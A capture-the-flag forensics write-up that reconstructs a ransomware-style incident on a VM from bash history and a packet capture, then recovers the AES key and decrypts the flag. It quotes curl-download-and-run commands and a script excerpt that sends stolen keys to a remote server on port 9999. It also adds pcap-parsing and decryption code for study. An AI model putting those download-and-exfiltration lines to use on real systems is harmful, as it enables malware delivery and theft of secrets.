Tags: forensics pcap python 

In this challenge we were presented with an OVA archive. After importing and booting the VM we had to reset the root password. A common method is to append `init=/bin/sh` to the kernel line in GRUB, remount the root filesystem read-write and run `passwd`.

Then we extracted the relevant files from `/home`, which contained two user directories, `prod` and `test`.

So let's find out what has happened on the system:

`.bash_history` for `test` had following entries:

```
curl http://192.168.1.38/clev.py > .s.py
curl http://192.168.1.38:8080/clev.py > .s.py
curl http://192.168.1.38:8888/clev.py > .s.py
curl http://192.168.1.38:1111/clev.py > .s.py
file .s.py
python3.7 .s.py
rm .s.py
...
```

So someone downloaded a script (four `curl` attempts against different ports, the last one on 1111), ran it with Python 3.7 and deleted it afterwards. `/home/test/data/secrets.txt.enc`, which that script presumably encrypted, is our candidate for the flag. Since the script itself is gone, we continue somewhere else.

`/home/prod` contained a PCAP file. A quick filter for port 1111 (the last port tried in the history) revealed the HTTP response carrying an obfuscated Python script. Some observations:
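As an added example (not part of the original writeup, and not the tooling its author used), here is a minimal classic-libpcap reader that pulls the port-1111 TCP stream out of a capture, reassembles it by sequence number and strips the HTTP headers to get the fetched file. The capture it runs on is constructed inline: the victim address 192.168.1.50, the client port 40000 and the script body are made-up stand-ins; the server 192.168.1.38:1111 is the one from the history. Only classic pcap (not pcapng), Ethernet/IPv4/TCP and in-order or duplicated segments are handled, and checksums are not verified.

```python
import struct

# ---- writer: build a tiny classic-pcap file so the example runs offline ----

def _ip4(addr: str) -> bytes:
    return bytes(int(o) for o in addr.split("."))

def build_tcp_frame(src: str, sport: int, dst: str, dport: int, seq: int, payload: bytes) -> bytes:
    """Ethernet/IPv4/TCP frame around `payload`. Checksums are left as zero; the
    reader below does not verify them (Wireshark would flag them, which is fine)."""
    tcp = struct.pack("!HHIIBBHHH", sport, dport, seq, 0, 5 << 4, 0x18, 65535, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0x4000, 64, 6, 0,
                     _ip4(src), _ip4(dst)) + tcp
    eth = bytes.fromhex("525400000001") + bytes.fromhex("525400000002") + b"\x08\x00"
    return eth + ip

def build_pcap(frames: list) -> bytes:
    """Classic libpcap container: little-endian magic, linktype 1 = Ethernet."""
    out = [struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)]
    for i, frame in enumerate(frames):
        out.append(struct.pack("<IIII", 1_700_000_000 + i, 0, len(frame), len(frame)) + frame)
    return b"".join(out)

# ---- reader: the part you would point at the real capture ----

def tcp_segments(pcap: bytes):
    """Yield (src, sport, dst, dport, seq, payload) for each TCP segment in the file."""
    magic, = struct.unpack_from("<I", pcap, 0)
    endian = {0xA1B2C3D4: "<", 0xD4C3B2A1: ">"}.get(magic)
    if endian is None:
        raise ValueError("not a classic pcap (pcapng is not handled here)")
    if struct.unpack_from(endian + "I", pcap, 20)[0] != 1:
        raise ValueError("only Ethernet (linktype 1) is handled")
    off = 24
    while off + 16 <= len(pcap):
        _sec, _usec, incl, _orig = struct.unpack_from(endian + "IIII", pcap, off)
        frame = pcap[off + 16: off + 16 + incl]
        off += 16 + incl
        if len(frame) < 34 or frame[12:14] != b"\x08\x00" or frame[23] != 6:
            continue                                  # not IPv4 carrying TCP
        ihl = (frame[14] & 0x0F) * 4
        ip = frame[14:14 + struct.unpack_from("!H", frame, 16)[0]]
        src, dst = ".".join(map(str, ip[12:16])), ".".join(map(str, ip[16:20]))
        tcp = ip[ihl:]
        sport, dport, seq = struct.unpack_from("!HHI", tcp, 0)
        yield src, sport, dst, dport, seq, tcp[(tcp[12] >> 4) * 4:]

def reassemble(pcap: bytes, port: int) -> dict:
    """Concatenate payloads per flow direction in sequence order. Retransmitted
    segments (same seq) collapse into one; gaps and overlaps are not handled."""
    flows = {}
    for src, sport, dst, dport, seq, data in tcp_segments(pcap):
        if port in (sport, dport) and data:
            flows.setdefault((src, sport, dst, dport), {})[seq] = data
    return {k: b"".join(v[s] for s in sorted(v)) for k, v in flows.items()}

def http_body(stream: bytes) -> bytes:
    """Drop the HTTP header block; what is left is the file the client fetched."""
    _head, sep, body = stream.partition(b"\r\n\r\n")
    return body if sep else b""

def recover_script(pcap: bytes, port: int = 1111) -> bytes:
    """Server-to-client direction of the flow on `port`, minus the HTTP headers."""
    for (src, sport, dst, dport), data in reassemble(pcap, port).items():
        if sport == port:
            return http_body(data)
    return b""

# ---- constructed capture: victim 192.168.1.50 and the script body are made up ----
SCRIPT = b"import random, socket\n# constructed stand-in for clev.py\n"
HEADERS = b"HTTP/1.0 200 OK\r\nContent-Type: text/x-python\r\nContent-Length: %d\r\n\r\n" % len(SCRIPT)
RESPONSE = HEADERS + SCRIPT
SAMPLE_PCAP = build_pcap([
    build_tcp_frame("192.168.1.50", 40000, "192.168.1.38", 1111, 1000,
                    b"GET /clev.py HTTP/1.1\r\nHost: 192.168.1.38:1111\r\n\r\n"),
    build_tcp_frame("192.168.1.38", 1111, "192.168.1.50", 40000, 5040, RESPONSE[40:]),  # arrives first
    build_tcp_frame("192.168.1.38", 1111, "192.168.1.50", 40000, 5000, RESPONSE[:40]),
    build_tcp_frame("192.168.1.38", 1111, "192.168.1.50", 40000, 5000, RESPONSE[:40]),  # retransmit
])

if __name__ == "__main__":
    print(recover_script(SAMPLE_PCAP).decode())
```

On a real capture replace `SAMPLE_PCAP` with `open("capture.pcap", "rb").read()`; the same `reassemble(pcap, 9999)` call gives the exfiltration stream to the key server.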

```
for x in o(16):
p=''.join(random.choices(C,k=16))
M.append(p)
```

`p` is reassigned on every iteration, so after the loop only the last generated key remains in `p`; the encryption that follows uses that one, while all 16 keys are kept in `M` for exfiltration.

```
u=','.join(k for k in M)
u=W(u,"utf-8")
u=base64.b64encode(u)
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(g)
s.sendall(W(Q.id,"utf-8"))
s.recv(1)
s.sendall(u)
```

This sends the keys to a second server, `g`, which turns out to be 192.168.1.38:9999.

A quick look in the PCAP confirms this: the client sends an ID for the machine, then all 16 keys, comma-separated and base64-encoded:

`bVRHZWxqaERSS0FTS0toUSxGTHJzU0V2ZVFRaWxvUFJuLFhlZFhIWUJVSHBJWERCSlAsSU9HUEVyam9zeE5pUXJOTSxSenZwYkVVUkxkRmZhR0ZNLHZkQlZEQ3ZpeGpTaENRdnksRVFsY3NuVXR6Q0h5RlBITSxKa0RpamdBRmlWQldKYUx6LGdoY1BJT1NxQ2RDVHFPcEQsRG5lQ3dia0RIa29qcHBIbSxsVlJaUmVBbGFJekhnaXNjLE5kamNnVlZqaWlueGZ0Q0MsUmtnTHBSQ3FybmlicnFzTixremV3dGVBZ1BFWmRrelFKLEhucEdvVWVxY2tFcXhwUW0sTFNOV1JhclRoUmRpUExwTQ==`

Base64 decoding gives us the keys:

`mTGeljhDRKASKKhQ,FLrsSEveQQiloPRn,XedXHYBUHpIXDBJP,IOGPErjosxNiQrNM,RzvpbEURLdFfaGFM,vdBVDCvixjShCQvy,EQlcsnUtzCHyFPHM,JkDijgAFiVBWJaLz,ghcPIOSqCdCTqOpD,DneCwbkDHkojppHm,lVRZReAlaIzHgisc,NdjcgVVjiinxftCC,RkgLpRCqrnibrqsN,kzewteAgPEZdkzQJ,HnpGoUeqckEqxpQm,LSNWRarThRdiPLpM`

So in order to decrypt the file we take the last of the 16 keys, `LSNWRarThRdiPLpM`, as the AES-128 key (16 ASCII bytes; the script uses ECB mode, so there is no IV to recover).

```
>>> from Crypto.Cipher import AES
>>> from Crypto.Util.Padding import unpad
>>> ct = open("secrets.txt.enc", "rb").read()
>>> c = AES.new(b"LSNWRarThRdiPLpM", AES.MODE_ECB)   # PyCryptodome wants a bytes key, not str
>>> c.decrypt(ct)
b'flag{26c08ad080830d6dcd76c15009ab6b03}\n\t\t\t\t\t\t\t\t\t'
>>> unpad(c.decrypt(ct), AES.block_size)   # the nine \t are PKCS#7 padding: 9 bytes of 0x09
b'flag{26c08ad080830d6dcd76c15009ab6b03}\n'
```
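As an added example (not from the original writeup), the same recovery done without trusting our reading of the obfuscated loop: decode the exfiltrated blob, then try all 16 keys and accept the one whose decryption has valid PKCS#7 padding and is plain text. The base64 blob is the one captured on the wire; the ciphertext is constructed here (a made-up flag encrypted under the 16th key) because the real `secrets.txt.enc` is not reproduced on the page. It uses PyCryptodome like the writeup, falling back to the `cryptography` package if that is not installed.

```python
from __future__ import annotations
import base64

# AES-ECB primitive: PyCryptodome (what the writeup uses) or, failing that, 'cryptography'.
try:
    from Crypto.Cipher import AES

    def aes_ecb(key: bytes, data: bytes, encrypt: bool = False) -> bytes:
        c = AES.new(key, AES.MODE_ECB)
        return c.encrypt(data) if encrypt else c.decrypt(data)
except ImportError:
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

    def aes_ecb(key: bytes, data: bytes, encrypt: bool = False) -> bytes:
        c = Cipher(algorithms.AES(key), modes.ECB())
        op = c.encryptor() if encrypt else c.decryptor()
        return op.update(data) + op.finalize()

# The exfiltrated payload exactly as seen on the wire to 192.168.1.38:9999 (from the capture).
EXFIL_B64 = (
    "bVRHZWxqaERSS0FTS0toUSxGTHJzU0V2ZVFRaWxvUFJuLFhlZFhIWUJVSHBJWERCSlAsSU9HUEVyam9zeE5pUXJOTSxS"
    "enZwYkVVUkxkRmZhR0ZNLHZkQlZEQ3ZpeGpTaENRdnksRVFsY3NuVXR6Q0h5RlBITSxKa0RpamdBRmlWQldKYUx6LGdo"
    "Y1BJT1NxQ2RDVHFPcEQsRG5lQ3dia0RIa29qcHBIbSxsVlJaUmVBbGFJekhnaXNjLE5kamNnVlZqaWlueGZ0Q0MsUmtn"
    "THBSQ3FybmlicnFzTixremV3dGVBZ1BFWmRrelFKLEhucEdvVWVxY2tFcXhwUW0sTFNOV1JhclRoUmRpUExwTQ=="
)

def parse_keys(blob_b64: str) -> list[bytes]:
    """The exfil format is base64(",".join(keys)); each key is 16 chars, i.e. AES-128."""
    keys = base64.b64decode(blob_b64).split(b",")
    if any(len(k) != 16 for k in keys):
        raise ValueError("expected 16-byte keys")
    return keys

def pkcs7_pad(data: bytes, bs: int = 16) -> bytes:
    n = bs - len(data) % bs
    return data + bytes([n]) * n

def pkcs7_unpad(data: bytes, bs: int = 16) -> bytes | None:
    """Strict PKCS#7 check; None means 'not padded with this scheme'."""
    if not data or len(data) % bs:
        return None
    n = data[-1]
    if not 1 <= n <= bs or data[-n:] != bytes([n]) * n:
        return None
    return data[:-n]

def recover(ciphertext: bytes, keys: list[bytes]) -> tuple[int, bytes] | None:
    """Try every key; keep the first whose decryption both unpads cleanly and is
    plain ASCII. A wrong AES key yields pseudo-random bytes, which pass both
    checks with negligible probability, so the result does not depend on having
    read the obfuscated loop correctly."""
    for i, key in enumerate(keys):
        pt = pkcs7_unpad(aes_ecb(key, ciphertext))
        if pt is None:
            continue
        try:
            pt.decode("ascii")
        except UnicodeDecodeError:
            continue
        return i, pt
    return None

# Constructed stand-in for secrets.txt.enc: a made-up flag encrypted under the 16th key.
SAMPLE_PLAINTEXT = b"flag{not_the_real_flag_just_a_demo}\n"

def sample_ciphertext() -> bytes:
    return aes_ecb(parse_keys(EXFIL_B64)[15], pkcs7_pad(SAMPLE_PLAINTEXT), encrypt=True)

if __name__ == "__main__":
    idx, pt = recover(sample_ciphertext(), parse_keys(EXFIL_B64))
    print(f"key #{idx + 1} worked: {pt!r}")
```

Because ECB decrypts each block independently, the key trial can be run on the last 16 bytes of the file alone and the whole file decrypted only once the key is known; that matters when the encrypted data is large or when there are many candidate keys.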